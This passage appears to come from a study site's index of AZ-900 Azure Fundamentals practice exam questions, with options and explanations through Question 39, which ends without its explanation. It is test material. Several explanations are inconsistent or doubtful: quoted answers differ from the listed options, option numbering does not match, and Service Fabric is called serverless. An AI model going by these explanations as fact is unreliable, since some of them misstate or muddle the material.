                            Explanation: The correct answer is \"They are resources that execute tasks requiring CPU cycles\". In cloud computing, the term \"compute\" refers to the amount of computational power required to process a task - essentially, it's anything that uses processing power (CPU cycles) to perform operations. This includes, but is not limited to, running applications, executing scripts, and processing data. While virtual machines (VMs) are a common type of compute resource, they are not the only type. Azure offers a wide variety of compute resources, like Azure Functions for serverless computing, Azure Kubernetes Service for container-based applications, and Azure Batch for parallel and high-performance computing tasks. So, the definition of compute resources is broader than just VMs or certain resources listed in the Azure Marketplace. It also includes more than VMs, Storage Accounts, and Virtual Networks, as these other resources (storage and networking) have distinct roles separate from the compute resources. Storage accounts deal with data storage while virtual networks are concerned with networking aspects in Azure, not with performing tasks that require CPU cycles. Therefore, \"They are resources that execute tasks requiring CPU cycles\" is the most accurate answer. See:\u00a0https://azure.microsoft.com/en-us/product-categories/compute/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-which-azure-service-contains-pre-built-machine-learning-models-that-you-can-use-in-your-own-code-using-an-api","title":"Question 8:\u00a0Which\u00a0Azure Service contains pre-built machine learning models that you can use in your own code, using an API?","text":"
                            • Cognitive Services
                            • Azure Functions
                            • Azure Blueprints
                            • App Services

                            Explanation: Cognitive Services is an API that Azure provides, that gives access to a set of pre-built machine learning models including vision services, speech services, knowledge management and chat bots.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-in-microsoft-azure-what-is-the-maximum-number-of-virtual-machines-that-can-be-included-in-a-single-virtual-machine-scale-set-as-per-azures-standard-guidelines-and-capabilities","title":"Question 9: In Microsoft Azure, what is the maximum number of virtual machines that can be included in a single Virtual Machine Scale Set, as per Azure's standard guidelines and capabilities?","text":"
                            • 10000
                            • 1000
                            • Unlimited
                            • 500

                            Explanation: The correct answer is 1000. Azure Virtual Machine Scale Sets are a service provided by Azure that allows you to manage, scale, and distribute large numbers of identical virtual machines. As per the limitations set by Microsoft Azure, a single Virtual Machine Scale Set can support up to 1000 VM instances. This capacity allows for high availability and network load balancing across a large number of virtual machines, providing a robust and efficient solution for applications that require heavy compute resources. However, if you are using custom VM images, this limit decreases to 600 instances. This functionality is part of Azure's Infrastructure as a Service (IaaS) offerings, providing flexibility and scalability to businesses and developers. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-what-feature-within-azure-will-make-recommendations-to-you-about-reducing-cost-on-your-account","title":"Question 10:\u00a0What feature within Azure will make recommendations to you about reducing cost on your account?","text":"
                            • Azure Service Health
                            • Azure Security Center
                            • Azure Advisor
                            • Azure Dashboard

                            Explanation: Azure Advisor analyzes your account usage and makes recommendations for you based on its set rules. See:\u00a0https://docs.microsoft.com/en-us/azure/advisor/advisor-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-your-organization-has-implemented-an-azure-policy-that-restricts-the-type-of-virtual-machine-instances-you-can-use-how-can-you-create-a-vm-that-is-blocked-by-the-policy","title":"Question 11: Your organization has implemented an Azure Policy that restricts the type of Virtual Machine instances you can use. How can you create a VM that is blocked by the policy?","text":"
                            • Use an account that has Contributor or above permissions to the resource group
                            • Subscription Owners (Administrators) can create resources regardless of what the policy restricts
                            • The only way is to remove the policy, create the resource and add the policy back

                            Explanation: You cannot perform a task that violates policy, so you have to remove the policy in order to perform the task. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-you-have-decided-to-subscribe-to-azure-ddos-protection-at-the-ip-protection-tier-this-provides-advanced-protection-to-defend-against-ddos-attacks-what-type-of-ddos-attack-does-ddos-protection-not-protect-against","title":"Question 12:\u00a0You have decided to subscribe to Azure DDoS\u00a0Protection at the IP Protection Tier. This provides advanced protection to defend against DDoS attacks. What type of DDoS attack does DDoS Protection NOT\u00a0protect against?","text":"
                            • Transport (L4)\u00a0level attacks
                            • Application (L7) level attacks
                            • Network (L3)\u00a0level attacks

                            Explanation: The correct answer is \"Application level attacks\":

                            • Network-level attacks\u00a0are attacks that target the network infrastructure, such as the routers and switches that connect your Azure resources to the internet. Azure DDoS Protection IP Protection Tier can protect against network-level attacks by absorbing and rerouting excessive traffic, and by scrubbing malicious traffic.

                            • Transport-level attacks\u00a0are attacks that target the transport layer of the network protocol stack, such as TCP and UDP. Azure DDoS Protection IP Protection Tier can protect against transport-level attacks by absorbing and rerouting excessive traffic, and by scrubbing malicious traffic.

                            • Application-level attacks\u00a0are attacks that target the application layer of the network protocol stack, such as HTTP and DNS. Azure DDoS Protection IP Protection Tier\u00a0does not\u00a0protect against application-level attacks, because it is designed to protect against network and transport-level attacks.

                            To protect against application-level attacks, you need to use a web application firewall (WAF). A WAF is a software appliance that sits in front of your application and filters out malicious traffic. WAFs can be configured to protect against a wide variety of application-level attacks, such as SQL injection, cross-site scripting, and denial of service attacks. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-characteristics-of-a-cloud-based-system-primarily-contributes-to-its-elasticity","title":"Question 13: Which of the following characteristics of a cloud-based system primarily contributes to its elasticity?","text":"
                            • The system's ability to recover automatically after a crash.
                            • The system's ability to dynamically increase and decrease capacity based on real-time demand.
                            • The system's ability to maintain availability while updates are being implemented.
                            • The system's ability to withstand denial-of-service attacks.

                            Explanation: The correct answer is \"The ability to increase and reduce capacity based on actual demand.\" This characteristic refers to the concept of\u00a0elasticity\u00a0in cloud computing. An elastic system\u00a0is one that can automatically adjust its resources\u00a0(compute, storage, etc.) in response to changing workloads and demands. This is done to ensure optimal performance and cost-effectiveness. When demand increases, the system can scale out by adding more resources, and when demand decreases, it can scale in by reducing resources, all without significant manual intervention. The other options, while important for overall system robustness, do not define elasticity. Withstanding denial of service attacks pertains to security, maintaining availability during updates refers to zero-downtime deployment or high availability, and self-healing after a crash refers to resilience or fault tolerance. None of these are about dynamically adjusting capacity based on demand, which is the hallmark of an elastic system. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-elastic-computing/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-logic-apps-functions-and-service-fabric-are-all-examples-of-what-model-of-compute-within-azure","title":"Question 14:\u00a0Logic apps, functions, and service fabric are all examples of what model of compute within Azure?","text":"
                            • SaaS model
                            • App Services Model
                            • IaaS model
                            • Serverless model

                            Explanation: The correct answer is the Serverless model. Azure Logic Apps, Azure Functions, and Azure Service Fabric are all examples of serverless computing in Azure. Serverless computing is a cloud computing model where the cloud provider automatically manages the provisioning and allocation of servers, hence the term \"serverless\". The serverless model allows developers to focus on writing the code and business logic rather than worrying about the underlying infrastructure, its setup, maintenance, scaling, and capacity planning.

                            • Azure Logic Apps is a cloud service that allows developers to build workflows that integrate apps, data, services, and systems.
                            • Azure Functions is an event-driven, compute-on-demand experience that extends the existing Azure application platform with capabilities to implement code triggered by events occurring in Azure or third-party services.
                            • Azure Service Fabric is a distributed systems platform that makes it easy to package, deploy, and manage scalable and reliable microservices.

                            In contrast, IaaS (Infrastructure as a Service) refers to cloud-based services where you rent IT infrastructure\u2014servers and virtual machines (VMs), storage, networks, and operating systems\u2014from a cloud provider on a pay-as-you-go basis. SaaS (Software as a Service) is a software distribution model in which a third-party provider hosts applications and makes them available to customers over the Internet, which doesn't align with the services mentioned in the question. The App Services model is a platform for hosting web applications, REST APIs, and mobile backends, but it's not strictly serverless as it doesn't auto-scale in the same way. See:\u00a0https://azure.microsoft.com/en-us/solutions/serverless/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-what-is-a-primary-benefit-of-opting-for-a-consumption-based-pricing-model-over-a-time-based-pricing-model-in-cloud-services","title":"Question 15: What is a primary benefit of opting for a consumption-based pricing model over a time-based pricing model in cloud services?","text":"
                            • The ability to easily predict the future cost of the service.
                            • It always being cheaper to pay for consumption rather than paying hourly.
                            • Significant cost savings when the resources aren't needed for constant use.
                            • A simpler and easier-to-understand pricing model.

                            Explanation: The correct answer is \"Significant cost savings when the resources aren't needed for constant use\". In a consumption-based pricing model, also known as pay-as-you-go, customers are billed only for the specific resources they use. This model provides cost-efficiency for workloads with variable usage patterns or for resources that aren't needed continuously.

                            When compared to a time-based pricing model, where resources are billed on a fixed schedule regardless of actual use (for example, hourly or monthly), consumption-based pricing can result in significant cost savings if the resources are not used often or their usage fluctuates.

                            While the other options can be true in certain cases, they aren't inherently beneficial aspects of the consumption-based model. The cost predictability can be challenging due to the variable nature of usage (Answer 1), it's not always cheaper (Answer 2) as it depends on the resource usage pattern, and the simplicity of the pricing model (Answer 4) depends on the specific terms and conditions of the service provider. Therefore, the most accurate and generalizable benefit is the potential for cost savings with infrequent or variable resource use. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/functions-consumption-costs

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-in-microsoft-azure-which-tool-or-service-allows-for-the-organization-and-management-of-multiple-subscriptions-within-hierarchical-structures","title":"Question 16: In Microsoft Azure, which tool or service allows for the organization and management of multiple subscriptions within hierarchical structures?","text":"
                            • RBAC (Role-Based Access Control)
                            • Management Groups
                            • Azure Active Directory
                            • Resource Groups

                            Explanation: The correct answer is\u00a0Management Groups. In Azure, Management Groups provide a way to manage access, policies, and compliance for multiple subscriptions. They can be structured into a hierarchy for the organization's needs. All subscriptions within a Management Group automatically inherit the conditions applied to the Management Group, facilitating governance on a large scale.

                            Resource Groups, on the other hand, are containers for resources deployed on Azure. They do not provide management capabilities across multiple subscriptions.

                            RBAC (Role-Based Access Control)\u00a0is a system that provides fine-grained access management to Azure resources but it doesn't inherently support the organization of subscriptions into hierarchies.

                            Azure Active Directory\u00a0is a service that provides identity and access management capabilities but does not provide a direct mechanism for managing multiple subscriptions in nested hierarchies.

                            Hence, Management Groups is the correct answer as it directly allows for the management and organization of multiple subscriptions into nested hierarchies, which the other options do not. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/management-groups/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-which-feature-of-azure-active-directory-will-require-users-to-have-their-mobile-phone-in-order-to-be-able-to-log-in","title":"Question 17:\u00a0Which feature of Azure Active Directory will require users to have their mobile phone in order to be able to log in?","text":"
                            • Azure Security Center
                            • Multi-Factor Authentication
                            • Azure Information Protection (AIP)
                            • Advanced Threat Protection (ATP)

                            Explanation: Multi-Factor Authentication (MFA) - the concept of having something additional to a \u201cpassword\u201d that is required to log in; passwords are find-able or guessable; but having your mobile phone on you to receive a phone call, text or run an app to get a code is harder for an unknown hacker to get. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-who-is-responsible-for-the-security-of-the-physical-servers-in-an-azure-data-center","title":"Question 18: Who is responsible for the security of the physical servers in an Azure data center?","text":"
                            • Azure is responsible for securing the physical data centers
                            • I am responsible for securing the physical data centers

                            Explanation: Azure is responsible for physical security. See:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/physical-security

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-true-or-false-azure-is-a-public-cloud-and-has-no-private-cloud-offerings","title":"Question 19:\u00a0True or False: Azure is a public cloud, and has no private cloud offerings","text":"
                            • TRUE
                            • FALSE

                            Explanation: The correct answer is FALSE. While Azure is indeed widely recognized as a public cloud provider, offering a vast array of services accessible via the internet on a multi-tenant basis, it does also provide private cloud capabilities. One notable offering is Azure Stack, an extension of Azure that allows businesses to run apps in an on-premises environment and deliver Azure services in their datacenter. With Azure Stack, you get the flexibility of using Azure\u2019s cloud capabilities while maintaining your own datacenter for privacy, regulatory compliance, or other requirements. Additionally, Azure offers services such as Azure Private Link, which provides private connectivity from a virtual network to Azure services, and Azure ExpressRoute, a service that enables a private, dedicated network connection to Azure. So, contrary to the statement, Azure does have private cloud offerings along with its public cloud, making the statement FALSE. See:\u00a0

                            • https://azure.microsoft.com/en-us/overview/what-is-a-private-cloud/
                            • https://azure.microsoft.com/en-us/global-infrastructure/government/
                            • https://azure.microsoft.com/en-us/overview/azure-stack/
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-who-is-responsible-for-the-security-of-your-azure-storage-account-access-keys","title":"Question 20:\u00a0Who is responsible for the security of your Azure Storage account access keys?","text":"
                            • Azure is responsible for securing the access keys
                            • I am responsible for securing the access keys

                            Explanation: Customers are responsible to secure the access keys they are given and regenerate them if they are exposed. See:\u00a0https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-which-feature-within-azure-collects-all-of-the-logs-from-various-resources-into-a-central-dashboard-where-you-can-run-queries-view-graphs-and-create-alerts-on-certain-events","title":"Question 21:\u00a0Which feature within Azure collects all of the logs from various resources into a central dashboard, where you can run queries, view graphs, and create alerts on certain events?","text":"
                            • Azure Portal Dashboard
                            • Azure Monitor
                            • Azure Security Center
                            • Storage Account or Event Hub

                            Explanation: Azure Monitor - a centralized dashboard that collects all the logs, metrics and events from your resources. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-when-establishing-a-site-to-site-vpn-connection-with-azure-what-kind-of-network-device-needs-to-be-present-or-installed-in-your-companys-on-premises-network-infrastructure","title":"Question 22: When establishing a Site-to-Site VPN connection with Azure, what kind of network device needs to be present or installed in your company's on-premises network infrastructure?","text":"
                            • An Azure Virtual Network
                            • An Application Gateway
                            • A dedicated virtual machine
                            • A compatible VPN Gateway device

                            Explanation: The correct answer is a compatible VPN Gateway device. In order to establish a site-to-site VPN connection with Azure, a VPN Gateway is required on your company's internal network. A VPN Gateway is a specific type of virtual network gateway that sends encrypted traffic across a public network, like the Internet. While the name might suggest it's a purely virtual entity, in practice, the term \"VPN Gateway\" often refers to a hardware device that's installed on-premises in your data center. This device uses Internet Protocol security (IPsec) to establish a secure, encrypted connection to the Azure VPN Gateway, which resides in the Azure virtual network. This setup allows your local network and Azure to interact as if they're directly connected. In contrast, virtual machines, virtual networks, and application gateways are other types of Azure resources, but they do not facilitate creating a site-to-site VPN connection. It's important to note that your company's internal network hardware and settings must meet specific requirements to support a VPN Gateway. See:\u00a0https://docs.microsoft.com/en-us/azure/vpn-gateway/vpn-gateway-howto-site-to-site-resource-manager-portal

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-which-of-the-following-is-something-that-azure-cognitive-services-api-can-currently-do","title":"Question 23:\u00a0Which of the following is something that Azure Cognitive Services API can currently do?","text":"
                            • Translate text from one language to another
                            • All of these! Azure can do it all!
                            • Speak text in an extremely realistic way
                            • Create text from audio
                            • Recognize text in an image

                            Explanation: Azure can do all of them, of course. See:\u00a0https://docs.microsoft.com/en-us/azure/cognitive-services/welcome

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-which-of-the-following-azure-features-is-most-likely-to-deliver-the-most-immediate-savings-when-it-comes-to-reducing-azure-costs","title":"Question 24:\u00a0Which of the following Azure features is most likely to deliver the most immediate savings when it comes to reducing Azure costs?","text":"
                            • Changing your storage accounts from globally redundant (GRS) to locally redundant (LRS)
                            • Auto shutdown of development and QA servers over night and on weekends
                            • Using Azure Reserved Instances for most of your virtual machines
                            • Using Azure Policy to restrict the user of expensive VM SKUs

                            Explanation: Reserved Instances often offer 40% or more savings off of the price of pay-as-you-go virtual machines. See:\u00a0https://docs.microsoft.com/en-us/azure/cost-management-billing/reservations/save-compute-costs-reservations

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-in-the-context-of-azures-high-availability-solutions-what-is-the-primary-purpose-of-azure-availability-zones","title":"Question 25:\u00a0In the context of Azure's high availability solutions, what is the primary purpose of Azure Availability Zones?","text":"
                            • They serve as a folder structure in Azure used for organizing resources such as databases, virtual machines, and virtual networks.
                            • They are synonymous with an Azure region.
                            • They allow manual selection of data centers for virtual machine placement to achieve superior availability compared to other options.
                            • They represent certain server racks within individual data centers, specifically designed by Azure for higher uptime.

                            Explanation: The correct answer is: \"They allow manual selection of data centers for virtual machine placement to achieve superior availability compared to other options.\"

                            Azure Availability Zones are a high availability offering that protects applications and data from datacenter failures. Each Azure region is composed of multiple datacenters, and each datacenter is essentially an Availability Zone. They are unique physical locations within a region, equipped with their own independent power, cooling, and networking. By placing your resources across different Availability Zones within a region, you can protect your apps and data from the failure of a single datacenter. If one datacenter goes down, the resources in the other datacenters (Availability Zones) can continue to operate, providing redundancy and increasing the overall availability of your applications. It's important to note that these zones are not the same as Azure regions (which are geographical areas containing one or more datacenters), nor are they equivalent to resource groups (which are logical containers for resources deployed on Azure). They are also not isolated to specific racks within a datacenter, but rather spread across different datacenters in a region, offering a broader scope of protection. See:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-which-of-the-following-characteristics-is-essential-for-a-system-to-be-considered-highly-available-in-a-cloud-computing-environment","title":"Question 26:\u00a0Which of the following characteristics is essential for a system to be considered highly available in a cloud computing environment?","text":"
                            • The system must maintain 100% availability at all times.
                            • The system must be designed for resilience, with no single points of failure.
                            • It's impossible to create a highly available system.
                            • The system must operate on a minimum of two virtual machines.

                            Explanation: The correct answer is \"A system specifically designed to be resilient, with no single point of failures\". High availability in a system means that it is designed to operate continuously without failure for a long period of time. This is achieved by building redundancy into the system, eliminating single points of failure, and enabling rapid recovery from any failures that do occur. In other words, even if a component of the system fails, there are other components that can take over, allowing the system to continue operating seamlessly. While high availability often aims for close to 100% uptime, the claim of maintaining 100% availability is practically unrealistic due to factors like maintenance needs and unexpected failures. Also, having a minimum of two VMs may contribute to high availability but isn't a definitive requirement \u2014 it depends on the specifics of the system architecture. Finally, the assertion that it's not possible to create a highly available system is incorrect. There are established strategies and technologies for designing and operating highly available systems, and they are widely used in mission-critical applications across many industries. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/windows/availability

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-in-the-context-of-cloud-computing-how-is-the-benefit-of-agility-best-described","title":"Question 27: In the context of cloud computing, how is the benefit of 'agility' best described?","text":"
                            • It refers to the ability to swiftly recover from a large-scale regional failure.
                            • It refers to the ability to quickly respond to and drive changes in the market.
                            • It refers to the system's ability to easily scale up when it reaches full capacity.
                            • It refers to the ability to rapidly provision new resources.

                            Explanation: The correct answer is \"It refers to the ability to quickly respond to and drive changes in the market\". Agility, in the context of cloud computing, refers to the ability of an organization to rapidly adapt to market and environmental changes in productive and cost-effective ways. It involves quickly adjusting and adapting strategic and operational capabilities to respond to and take advantage of changes in the business environment. The other options, while also benefits of the cloud, do not directly align with the concept of agility. Spinning up new resources quickly (Answer 2) or growing capacity easily when full (Answer 3) relate more to the cloud's scalability and elasticity. The ability to recover from a region-wide failure rapidly (Answer 4) speaks to the cloud's resilience and disaster recovery capabilities. While these aspects can contribute to overall business agility, they don't encapsulate the broader strategic meaning of agility - the capacity to quickly adjust to market changes, which can include shifts in customer demand, competitive pressures, or regulatory changes, among others. Hence, the ability to respond to and drive market change quickly is the most accurate answer. See:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/strategy/business-outcomes/agility-outcomes

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-if-you-wanted-to-simply-use-azure-as-an-extension-of-your-own-datacenter-not-primarily-hosting-anything-there-but-using-it-for-extra-storage-or-taking-advantage-of-some-services-what-hosting-model-is-that-called","title":"Question 28: If you wanted to simply use Azure as an extension of your own datacenter, not primarily hosting anything there but using it for extra storage or taking advantage of some services, what hosting model is that called?","text":"
                            • Public cloud
                            • Hybrid cloud
                            • Private cloud

                            Explanation: The correct answer is \"Hybrid cloud.\" The scenario described in the question is a typical use case for a hybrid cloud model, which integrates private cloud or on-premises infrastructure with public cloud resources, such as those provided by Azure. In a hybrid cloud model, businesses can keep sensitive data or critical applications on their private cloud or on-premises datacenter for security and compliance reasons while using the public cloud's vast resources for additional storage, computational power, or specific services when necessary. This not only allows for greater flexibility and scalability, but also offers potential cost savings. In contrast, a purely public cloud model involves hosting all data and applications on a public cloud provider's infrastructure, and a purely private cloud model involves hosting everything on a business's own infrastructure or a rented, single-tenant infrastructure. The described scenario of extending an on-premises datacenter with Azure services fits best with the hybrid cloud model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-hybrid-cloud-computing/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-in-the-context-of-cloud-computing-a-virtual-machine-vm-is-primarily-associated-with-which-type-of-cloud-hosting-model","title":"Question 29: In the context of cloud computing, a virtual machine (VM) is primarily associated with which type of cloud hosting model?","text":"
                            • Software as a Service (SaaS)
                            • Infrastructure as a Service (IaaS)
                            • Platform as a Service (PaaS)

                            Explanation: The correct answer is IaaS, which stands for Infrastructure as a Service. In the context of cloud computing, a virtual machine (VM) is typically provided as part of an IaaS offering. With IaaS, the provider manages the underlying physical infrastructure (like servers, network equipment, and storage), while the consumer controls the virtualized components of the infrastructure, such as the virtual machines, their operating systems, and the applications running on them. This is contrasted with the other options. In a Platform as a Service (PaaS) model, the consumer only controls the applications and possibly some configuration settings for the application-hosting environment, but does not manage the operating system, server hardware, or network infrastructure. Similarly, in a Software as a Service (SaaS) model, the consumer only uses the software and does not control any aspect of the infrastructure or platform where the application runs. Therefore, given that a virtual machine involves control over the operating system and applications within a cloud-managed infrastructure, it aligns with the IaaS hosting model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-which-of-the-following-best-describes-the-primary-benefit-of-a-content-delivery-network-cdn-in-a-cloud-computing-context","title":"Question 30:\u00a0Which of the following best describes the primary benefit of a Content Delivery Network (CDN) in a cloud computing context?","text":"
                            • For a nominal fee, Azure will manage your virtual machine, perform OS updates, and ensure optimal performance.
                            • It mitigates server load for static, unchanging files like images, videos, and PDFs by distributing them across a network of servers.
                            • It enables temporary session information storage for web visitors, such as their login ID or name.
                            • It provides fast and inexpensive data retrieval for later use.

                            Explanation: The correct answer, \"It mitigates server load for static, unchanging files\", is indeed the core benefit of a Content Delivery Network (CDN). A CDN stores copies of a website's static files on servers distributed globally. These static files could be anything that doesn't change frequently, like images, CSS, JavaScript, videos, etc. When a user visits the site, they are served these static files from the CDN server nearest to them geographically. This reduces the latency, as the data has a shorter distance to travel. Additionally, it reduces the load on the original server because the CDN handles a significant portion of the traffic. As a result, not only is the user experience improved due to faster load times, but the operational efficiency and performance of the original server are also enhanced. Therefore, CDNs are essential for sites serving large amounts of static content to a geographically dispersed user base. See:\u00a0https://docs.microsoft.com/en-us/azure/cdn/cdn-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-what-is-the-name-of-the-group-of-services-inside-azure-that-hosts-the-apache-hadoop-big-data-analysis-tools","title":"Question 31: What is the name of the group of services inside Azure that hosts the Apache Hadoop big data analysis tools?","text":"
                            • Azure Hadoop Services
                            • Azure Data Factory
                            • HDInsight
                            • Azure Kubernetes Services

                            Explanation: The correct answer is HDInsight. HDInsight is Microsoft Azure's offering for hosting the Apache Hadoop big data analysis tools. Apache Hadoop is an open-source software platform that supports data-intensive distributed applications. This platform enables processing large amounts of data across clusters of computers. Azure HDInsight is a cloud distribution of the Hadoop components from the Hortonworks Data Platform. It allows Azure users to process vast amounts of data with popular open-source frameworks such as Hadoop, Hive, HBase, Storm, and others. Additionally, the HDInsight service also supports R, Python, Scala, and .NET. So, it's not just limited to traditional Hadoop tools. Options like 'Azure Hadoop Services' and 'Azure Data Factory' are incorrect as Azure doesn't have a service named 'Azure Hadoop Services' and 'Azure Data Factory' is a cloud-based data integration service. 'Azure Kubernetes Services' is a service for managing containerized applications, not specifically for Hadoop. See:\u00a0https://azure.microsoft.com/en-us/services/hdinsight/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-within-the-landscape-of-cloud-service-models-how-would-microsofts-outlook-365-be-best-categorized","title":"Question 32: Within the landscape of cloud service models, how would Microsoft's Outlook 365 be best categorized?","text":"
                            • Infrastructure as a Service (IaaS)
                            • Software as a Service (SaaS)
                            • Platform as a Service (PaaS)

                            Explanation: The correct answer is SaaS, which stands for Software as a Service. Outlook 365, part of Microsoft's Office 365 suite, is a cloud-based service that provides access to various applications and services, including email, calendars, and contact management, which are delivered over the internet. In a SaaS model, the service provider is responsible for the infrastructure, platform, and software, and ensures their maintenance and updates. Users simply access the services via a web browser or app, without needing to worry about the underlying infrastructure, platform, or software updates. This contrasts with Infrastructure as a Service (IaaS), where the user is responsible for managing the operating systems, middleware, and applications, and Platform as a Service (PaaS), where the user manages only the applications and data. In both these models, the users have more responsibilities compared to SaaS. Since Outlook 365 is a software application delivered over the web with all underlying infrastructure and platform taken care of by Microsoft, it falls into the SaaS hosting model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-saas/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-which-major-cloud-provider-offers-the-most-international-locations-for-customers-to-provision-virtual-machines-and-other-servers","title":"Question 33:\u00a0Which major cloud provider offers the most international locations for customers to provision virtual machines and other servers?","text":"
                            • Microsoft Azure
                            • Google Cloud Platform
                            • Amazon AWS

                            Explanation: Microsoft Azure offers the most extensive global coverage among major cloud providers regarding geographical regions. This allows customers to provision virtual machines, databases, and other services in various international locations closer to their user base, which can enhance performance, reduce latency, and comply with local regulations regarding data residency. While AWS (Amazon Web Services) and GCP (Google Cloud Platform) also provide many regions globally, Microsoft Azure has distinguished itself with the broadest regional availability. See:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/regions/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-which-azure-website-tool-is-available-for-you-to-estimate-the-future-costs-of-your-azure-products-and-services-by-adding-products-to-a-shopping-basket-and-helping-you-calculate-the-costs","title":"Question 34:\u00a0Which Azure website tool is available for you to estimate the future costs of your Azure products and services by adding products to a shopping basket and helping you calculate the costs?","text":"
                            • Azure Pricing Calculator
                            • Microsoft Docs
                            • Azure Advisor

                            Explanation: Azure Pricing Calculator lets you attempt to calculate your future bill based on resources you select and your estimates of usage. See:\u00a0https://azure.microsoft.com/en-us/pricing/calculator/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-what-is-the-name-of-azures-hosted-sql-database-service","title":"Question 35:\u00a0What is the name of Azure's hosted SQL database service?","text":"
                            • SQL Server in a VM
                            • Table Storage
                            • Cosmos DB
                            • Azure SQL Database

                            Explanation: SQL Database is a SQL Server compatible option in Azure, a database as a service. See:\u00a0https://docs.microsoft.com/en-us/azure/sql-database/sql-database-technical-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-true-or-false-you-cannot-have-more-than-one-azure-subscription-per-company","title":"Question 36:\u00a0True or false: You cannot have more than one Azure subscription per company","text":"
                            • TRUE
                            • FALSE

                            Explanation: You can have multiple subscriptions, as a way to separate out resources between billing units, business groups, or for any reason you wish. See:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/decision-guides/subscriptions/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-can-you-give-someone-else-access-to-your-azure-subscription-without-giving-them-your-user-name-and-password","title":"Question 37:\u00a0Can you give someone else access to your Azure subscription without giving them your user name and password?","text":"
                            • YES
                            • NO

                            Explanation: Yes, anyone can create their own Azure account and you can give them access to your subscription with granular control as to permissions. See:\u00a0https://docs.microsoft.com/en-us/azure/role-based-access-control/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-true-or-false-you-can-create-your-own-policies-if-built-in-azure-policy-is-not-sufficient-to-your-needs","title":"Question 38:\u00a0True or false: you can create your own policies if built-in Azure Policy is not sufficient to your needs","text":"
                            • FALSE
                            • TRUE

                            Explanation: True, you can create custom policies using JSON. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/tutorials/create-custom-policy-definition

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-in-the-context-of-azures-service-level-agreement-sla-for-virtual-machines-which-of-the-following-deployment-strategies-would-offer-the-highest-level-of-availability","title":"Question 39:\u00a0In the context of Azure's Service Level Agreement (SLA) for virtual machines, which of the following deployment strategies would offer the highest level of availability?","text":"
                            • Deploying two or more virtual machines across different availability zones within the same region.
                            • Deploying two or more virtual machines within the same data center.
                            • Deploying two or more virtual machines within an availability set.
                            • Deploying a single virtual machine.

